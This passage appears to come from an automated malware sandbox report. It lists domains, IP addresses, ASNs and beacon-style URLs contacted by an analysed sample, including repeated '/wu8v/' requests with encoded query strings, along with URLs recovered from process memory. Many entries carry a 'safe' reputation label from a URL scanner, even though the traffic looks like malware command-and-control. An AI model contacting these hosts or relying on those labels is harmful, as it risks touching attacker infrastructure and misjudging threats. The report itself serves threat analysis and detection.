            http://www.wp-bits.online/wu8v/0%Avira URL Cloudsafe
            http://www.glissy.ca/wu8v/?MdtlcTm=2Ekfj6jdIBk36xhcbV2ym43lHRKg6LV7IJvggRD/yKlDT5fLDaqmfwfg0kC4k4WA5tpgDGvB1m7jQvkf/ooPPLzV8n4D4xVHdcGXqhGJgd2fmMm1GJzEmqU=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo00%Avira URL Cloudsafe
            http://www.yekobie.com/wu8v/?MdtlcTm=ahy6va04TVDXAoc0SI77WnjdL1KdrpLWXquRcgE4oyJhjsOsnbVcxGfgc5U1b6nV6qG/kRi3KVZWLm+W9jeCK1XNsz8i7l9KE7k2fsNVpgLsbvF63CsRx24=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.auetravel.kz/wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.neulevel.biz/0%Avira URL Cloudsafe
            http://www.387mfyr.sbs/wu8v/0%Avira URL Cloudsafe
            http://www.pir.org/0%Avira URL Cloudsafe
            http://www.insertcoen.com/wu8v/0%Avira URL Cloudsafe
            http://www.marksmile.com/asset/lp_qrcode.png0%Avira URL Cloudsafe
            http://www.lm2ue.us/wu8v/0%Avira URL Cloudsafe
            http://www.insertcoen.com:80/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0%Avira URL Cloudsafe
            http://www.selectif.xyz/wu8v/0%Avira URL Cloudsafe
            http://www.xn--yzyp76d.com/wu8v/0%Avira URL Cloudsafe
            http://www.auetravel.kz/wu8v/0%Avira URL Cloudsafe
            http://www.fivetownsjcc.com/wu8v/?MdtlcTm=qj5NyNfN5WRMG7LniAROgWXsn6IsT6LjPGDeNkCQJp+HAmWfWpmvawkojhaRs1ogLHUlWi64I+vgy847wrcuJ4qAlI0oKyKfHw/MBjiNhxVy0+aqylgl+KA=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.wp-bits.online/wu8v/?MdtlcTm=h80XCq9V6N6s/txg4v4Fr8zmHDyj0DPil4lDzKoi2YAFaI23LxlO/y0x83EXcngteSl0Ff377sWS2kC2x8x2lEbqmRL/y9GY06LsNZ5NdSPXBqH5i7fNvls=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.marksmile.com/asset/lp_style.css0%Avira URL Cloudsafe
            http://www.selectif.xyz/wu8v/?MdtlcTm=ex7yQ3cnGheAaOrzEPkQGznKrbGAUhLo9VsCiDPBWJ5DUtj6oFWZ51Qu3bZCInwfBew3O0jwDr4r/fHP0DTqez+F51VR4AlcQUWQ9cVyxEHzKlzGRO1dndY=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.luckydomainz.shop/wu8v/0%Avira URL Cloudsafe
            http://www.lm2ue.us0%Avira URL Cloudsafe
            http://www.insertcoen.com/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0OI5nlukHb+wqYtKmURqZRRAHON04+Cmz5V6OWL/4It3e8ivry7nxqUmvN5lOs=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.rltattoo.com/wu8v/?MdtlcTm=kM+nKItVIOm9nxv083MKEZreo78kZmjvmDxFimKXw4NllaUxz2FZA/AxFfoR4c/c0+8T1IsyqFRuVBpkxsrpf3yFfXK/MNDg35iPLFQJ6s8K1nL5VHh3xe8=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            http://www.getgoodscrub.com/wu8v/0%Avira URL Cloudsafe
            http://www.yekobie.com/wu8v/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.selectif.xyz
            		203.161.46.103
            		truetrueunknown
            www.rltattoo.com
            		38.63.111.149
            		truefalseunknown
            yekobie.com
            		185.135.132.99
            		truefalseunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truefalse
              		high
              www.auetravel.kz
              		89.35.125.17
              		truefalseunknown
              glissy.ca
              		70.32.23.111
              		truefalseunknown
              www.lm2ue.us
              		91.195.240.123
              		truefalse
                		unknown
                insertcoen.com
                		62.149.128.40
                		truefalseunknown
                www.getgoodscrub.com
                		35.213.232.35
                		truefalseunknown
                www.387mfyr.sbs
                		137.220.252.40
                		truefalse
                  		unknown
                  www.xn--yzyp76d.com
                  		47.76.62.167
                  		truefalseunknown
                  www.btpbox.com
                  		213.36.252.182
                  		truefalseunknown
                  www.wp-bits.online
                  		116.203.164.244
                  		truefalse
                    		unknown
                    fivetownsjcc.com
                    		208.112.85.150
                    		truefalseunknown
                    www.yekobie.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.lebonergy.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.insertcoen.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.fivetownsjcc.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.luckydomainz.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              www.glissy.ca
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.rltattoo.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.xn--yzyp76d.com/wu8v/?MdtlcTm=1Nt7DtzRhGe3jz/JXOJL2dnBH6uFnvwsc8PmoPLhBuJURU+BFCU8Z1cZNkrKfh5y7OIVqmEx6Y55MHCBN9ekEPrBm2pelHdYOjg1gnpKSYR8wHJ7U/KLji4=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.btpbox.com/wu8v/?MdtlcTm=HNLEVoSmZQxFSmctMpTTd4dyTFjeIBcvYbInUpVYO5VLbn2V1MEgIHD38EU48JsuuCIVw/TFvn9kkkg/Sq9Xy2f3I5Wlm16rLCQIpVyEpLVAPUkeiuBH2KE=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.glissy.ca/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.btpbox.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wp-bits.online/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.yekobie.com/wu8v/?MdtlcTm=ahy6va04TVDXAoc0SI77WnjdL1KdrpLWXquRcgE4oyJhjsOsnbVcxGfgc5U1b6nV6qG/kRi3KVZWLm+W9jeCK1XNsz8i7l9KE7k2fsNVpgLsbvF63CsRx24=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.glissy.ca/wu8v/?MdtlcTm=2Ekfj6jdIBk36xhcbV2ym43lHRKg6LV7IJvggRD/yKlDT5fLDaqmfwfg0kC4k4WA5tpgDGvB1m7jQvkf/ooPPLzV8n4D4xVHdcGXqhGJgd2fmMm1GJzEmqU=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.insertcoen.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.auetravel.kz/wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.387mfyr.sbs/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lm2ue.us/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.selectif.xyz/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.xn--yzyp76d.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.auetravel.kz/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fivetownsjcc.com/wu8v/?MdtlcTm=qj5NyNfN5WRMG7LniAROgWXsn6IsT6LjPGDeNkCQJp+HAmWfWpmvawkojhaRs1ogLHUlWi64I+vgy847wrcuJ4qAlI0oKyKfHw/MBjiNhxVy0+aqylgl+KA=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.selectif.xyz/wu8v/?MdtlcTm=ex7yQ3cnGheAaOrzEPkQGznKrbGAUhLo9VsCiDPBWJ5DUtj6oFWZ51Qu3bZCInwfBew3O0jwDr4r/fHP0DTqez+F51VR4AlcQUWQ9cVyxEHzKlzGRO1dndY=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.luckydomainz.shop/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wp-bits.online/wu8v/?MdtlcTm=h80XCq9V6N6s/txg4v4Fr8zmHDyj0DPil4lDzKoi2YAFaI23LxlO/y0x83EXcngteSl0Ff377sWS2kC2x8x2lEbqmRL/y9GY06LsNZ5NdSPXBqH5i7fNvls=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.insertcoen.com/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0OI5nlukHb+wqYtKmURqZRRAHON04+Cmz5V6OWL/4It3e8ivry7nxqUmvN5lOs=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rltattoo.com/wu8v/?MdtlcTm=kM+nKItVIOm9nxv083MKEZreo78kZmjvmDxFimKXw4NllaUxz2FZA/AxFfoR4c/c0+8T1IsyqFRuVBpkxsrpf3yFfXK/MNDg35iPLFQJ6s8K1nL5VHh3xe8=&_X=ClAdyH4P7rA8zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.getgoodscrub.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.yekobie.com/wu8v/false
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabsfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.bookmyname.com/?wl=essfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.htmlsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=frsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://mail.365.com/login.htmlsfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.bookmyname.com/?wl=ensfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://www.marksmile.com/sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.afilias.info/sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://parked.reg.bookmyname.com/images/lien_2.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://www.bookmyname.com/tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://parked.reg.bookmyname.com/images/es_off.gifsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.eurid.eu/sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://parked.reg.bookmyname.com/images/all_off.gifsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.icann.org/sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://parked.reg.bookmyname.com/images/lien_1.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.bookmyname.com/whoisctc.cgi?wl=ensfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOsfc.exe, 0000000C.00000002.4093679938.0000000004682000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004212000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo0sfc.exe, 0000000C.00000002.4093679938.0000000003D16000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000038A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=ensfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.neulevel.biz/sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.pir.org/sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://parked.reg.bookmyname.com/images/lien_4.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.bookmyname.com/?wl=desfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.marksmile.com/asset/lp_qrcode.pngsfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shopsfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3A961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://parked.reg.bookmyname.com/images/lien_3.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.bookmyname.com/tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://parked.reg.bookmyname.com/images/lien_7.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://parked.reg.bookmyname.com/images/fr_on.gifsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.insertcoen.com:80/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDjsfc.exe, 0000000C.00000002.4093679938.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000485A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://parked.reg.bookmyname.com/styles/styles-redir.csssfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://parked.reg.bookmyname.com/images/lien_6.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://upx.sf.netAmcache.hve.9.drfalse
                                                                                          		high
                                                                                          https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpgsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://parked.reg.bookmyname.com/images/gb_off.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://parked.reg.bookmyname.com/images/lien_5.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.bookmyname.comsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.sedo.com/services/parking.php3sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://ac.ecosia.org/autocomplete?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://parked.reg.bookmyname.com/images/logo_book.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.bookmyname.com/?wl=frsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.marksmile.com/asset/lp_style.csssfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://img.sedoparking.com/templates/images/hero_nc.svgsfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://parked.reg.bookmyname.com/images/lien_8.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.lm2ue.ustyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.bookmyname.com/whoisctc.cgi?wl=frsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    62.149.128.40
                                                                                                                    		insertcoen.comItaly
                                                                                                                    		31034ARUBA-ASNITfalse
                                                                                                                    208.112.85.150
                                                                                                                    		fivetownsjcc.comUnited States
                                                                                                                    		20021LNH-INCUSfalse
                                                                                                                    137.220.252.40
                                                                                                                    		www.387mfyr.sbsSingapore
                                                                                                                    		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                                                    38.63.111.149
                                                                                                                    		www.rltattoo.comUnited States
                                                                                                                    		174COGENT-174USfalse
